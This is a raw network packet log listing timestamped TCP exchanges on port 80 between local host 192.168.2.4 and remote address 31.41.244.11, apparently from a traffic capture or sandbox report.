Dec 14, 2024 23:58:12.922936916 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.922997952 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.923051119 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.923950911 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.924001932 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.924042940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.924096107 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.925004005 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.925054073 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.925103903 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.925156116 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.926019907 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.926186085 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.926242113 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.927073956 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.927124023 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.927206993 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.927258015 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.928149939 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.928200006 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.928250074 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.928299904 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.929173946 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.929224968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.929328918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.929380894 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.930252075 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.930301905 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.930363894 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.930412054 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.931272984 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.931324959 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.931421995 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.931472063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.932334900 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.932384014 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.932519913 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.932569981 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.933418036 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.933527946 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.933579922 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.934488058 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.934551001 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.934575081 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.934626102 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.935524940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.935575962 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.935647011 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.935694933 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.936563969 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.936614990 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.936688900 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.936738968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.937624931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.937746048 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.937798023 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.938705921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.938755989 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.938802004 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.938855886 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.939755917 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.939807892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.939938068 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.939986944 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.940785885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.940846920 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.940913916 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.940960884 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.941864967 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.942028999 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.942089081 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.943084955 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.943139076 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.943141937 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.943197012 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.943968058 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.944020987 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.944103956 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.944159031 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.945009947 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.945061922 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.945137978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.945184946 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.946096897 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.946214914 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.946273088 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.947134972 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.947190046 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.947334051 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.947391987 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.948200941 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.948251963 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.948298931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.948353052 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.949198008 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.949249029 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.086221933 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.086291075 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.086435080 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.086664915 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.086802006 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.086884022 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.086884022 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.087698936 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.087774992 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.087821960 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.087888956 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.088769913 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.088872910 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.088927031 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.088927031 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.089807034 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.089946985 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.090055943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.090833902 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.090898037 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.090962887 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.091042042 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.091913939 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.092048883 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.092097998 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.092097998 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.092972040 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.093065023 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.093071938 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.093172073 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.094008923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.094177961 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.094257116 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.095129967 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.095227003 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.095246077 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.095278978 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.096129894 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.096245050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.096261978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.096322060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.097239971 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.097349882 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.097373009 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.097403049 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.098278999 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.098334074 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.098407984 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.098488092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.099297047 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.099358082 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.099406958 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.099462032 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.100395918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.100469112 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.100502968 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.100578070 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.101408005 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.101526976 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.101748943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.102463961 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.102579117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.102600098 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.102807999 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.103522062 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.103574991 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.103663921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.103735924 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.104584932 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.104679108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.104700089 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.104737043 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.105618954 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.105777025 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.105937958 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.106681108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.106739998 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.106823921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.107002020 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.107768059 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.107847929 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.107896090 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.107896090 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.108891010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.109039068 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.109056950 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.109100103 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.109836102 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.109967947 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.110023022 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.110901117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.110996008 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.111067057 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.111116886 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.111963034 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.112016916 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.112083912 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.112137079 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.112981081 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.113038063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.113106966 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.113157034 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.114058018 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.114178896 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.114412069 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.115115881 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.115201950 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.115269899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.115334034 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.116173029 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.116230965 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.116297007 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.116357088 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.117233038 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.117304087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.117345095 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.117489100 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.118297100 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.118416071 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.118419886 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.118474007 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.119329929 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.119410038 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.119452000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.119666100 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.120389938 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.120454073 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.120502949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.120553017 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.121447086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.121575117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.121658087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.122591972 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.122649908 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.122684956 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.122736931 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.123577118 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.123682976 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.123692989 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.123737097 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.124614000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.124752045 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.124806881 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.125664949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.125750065 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.125797987 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.125982046 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.126807928 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.126863003 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.126904011 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.127037048 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.127829075 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.127895117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.128015995 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.128869057 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.128942966 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.128967047 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.129096985 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.129862070 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.129993916 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.130089998 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.130930901 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.130980015 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.131052017 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.131104946 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.131987095 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.132114887 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.132183075 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.133057117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.133208036 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.133229971 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.133260965 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.134131908 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.134315014 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.134336948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.134368896 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.135149956 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.135236979 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.135287046 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.135350943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.136220932 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.136336088 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.136349916 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.136404991 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.137265921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.137363911 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.137394905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.137886047 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.138372898 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.138434887 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.138454914 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.138709068 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.139375925 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.139503956 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.139591932 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.140446901 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.140574932 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.140595913 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.140724897 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.141443968 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.143018961 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.278501987 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.278561115 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.278609037 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.278649092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.278934002 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.279004097 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.279175043 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.279248953 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.280015945 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.280174971 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.280234098 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.281284094 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.281342983 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.281459093 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.281512976 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.282094002 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.282222986 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.282294989 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.282449961 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.283183098 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.283266068 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.283359051 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.283519983 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.284224033 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.284296989 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.284370899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.284457922 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.285281897 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.285358906 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.285533905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.285679102 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.286417961 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.286544085 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.286556005 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.286680937 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.287380934 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.287529945 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.287553072 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.287650108 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.288489103 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.288595915 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.288642883 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.288686037 CET	49770	80	192.168.2.4	31.41.244.11
